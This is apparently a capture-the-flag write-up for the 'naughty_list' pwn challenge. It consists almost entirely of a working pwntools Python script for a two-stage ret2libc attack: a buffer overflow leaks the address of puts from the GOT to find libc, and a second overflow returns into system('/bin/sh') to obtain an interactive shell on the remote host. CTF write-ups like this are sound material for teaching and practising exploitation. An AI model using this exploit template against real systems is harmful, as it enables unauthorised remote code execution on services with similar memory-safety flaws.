Tags: pwn 

Rating:

### Author : Nima Dabbaghi

-----

```python
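#!/usr/bin/env python3
"""Two-stage ret2libc exploit for the `naughty_list` pwn challenge.

Stage 1: overflow the buffer read in `get_descr`, call `puts(puts@got)` to
leak a libc address, then return into `get_descr` for a second overflow.
Stage 2: rebase `libc` on the leak and return into `system("/bin/sh")`.

Run as `python3 exploit.py HOST=<host> PORT=<port>` (pwntools `args`).
Needs `./naughty_list` and the remote's `./libc.so.6` next to the script.
"""

from pwn import *

elf = ELF("./naughty_list")
libc = ELF("./libc.so.6")

context.binary = elf
rop = ROP(elf)

context.log_level = "debug"

# Connection target. pwntools parses KEY=value command-line arguments into
# `args`, so host/port are no longer bare placeholders / undefined names.
HOST = args.HOST or "ip"  # "ip" is the placeholder from the original listing
if not args.PORT:
    log.error("set PORT=<port> (and HOST=<host>) on the command line")
PORT = int(args.PORT)

# Distance from the start of the overflowed buffer to the saved return
# address; both payloads below place their chain at this offset.
RET_OFFSET = 40

# Gadget addresses from the binary. The listing gives only raw addresses, so
# their meaning is an assumption — verify with ROPgadget or
# `rop.find_gadget(["pop rdi", "ret"])` before reusing against another build.
POP_RDI = 0x0000000000401443  # presumably `pop rdi; ret`
RET = 0x0000000000400756      # presumably a lone `ret` (stack realignment before system)

p = remote(HOST, PORT)

p.sendlineafter(b":", b"nova")
p.sendlineafter(b":", b"security")
p.sendlineafter(b":", b"50")

# Stage 1: leak puts@got via puts, then re-enter get_descr for the second overflow.
rop.puts(elf.got.puts)
rop.call(elf.sym.get_descr)

payload = flat({RET_OFFSET: rop.chain()})
p.sendlineafter(b":", payload)

p.recvuntil(b"!\n")
# puts() prints the pointer up to its first NUL byte; a user-space x86-64
# address is 6 significant bytes, so read exactly 6 and zero-extend.
leak = u64(p.recv(6).ljust(8, b"\x00"))
info(f"Leaked libc.puts @ {hex(leak)} ")

libc.address = leak - libc.sym.puts
# Sanity check: a libc base is page-aligned. Non-zero low 12 bits mean the
# leak was misparsed or ./libc.so.6 is not the libc the remote is running.
if libc.address & 0xFFF:
    log.error(f"leak {hex(leak)} does not line up with libc.sym.puts; wrong libc.so.6 or misread leak")
success(f"Leaked libc @ {hex(libc.address)}")

# Stage 2: rdi <- "/bin/sh" (via POP_RDI), RET, then system.
rop2 = ROP(libc)
binsh = next(libc.search(b"/bin/sh"))

rop2.raw(POP_RDI)
rop2.raw(binsh)
rop2.raw(RET)  # ROP.raw() packs ints itself; the explicit pack() was redundant
rop2.raw(libc.sym.system)

payload = flat({RET_OFFSET: rop2.chain()})
p.sendlineafter(b":", payload)

p.interactive()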
```

*You need the challenge binary (`./naughty_list`) and the remote's `./libc.so.6` in the same directory as the script; the libc offsets used for the leak and for `system`/`"/bin/sh"` come from that file.*

Original writeup (https://novasecurity.net/).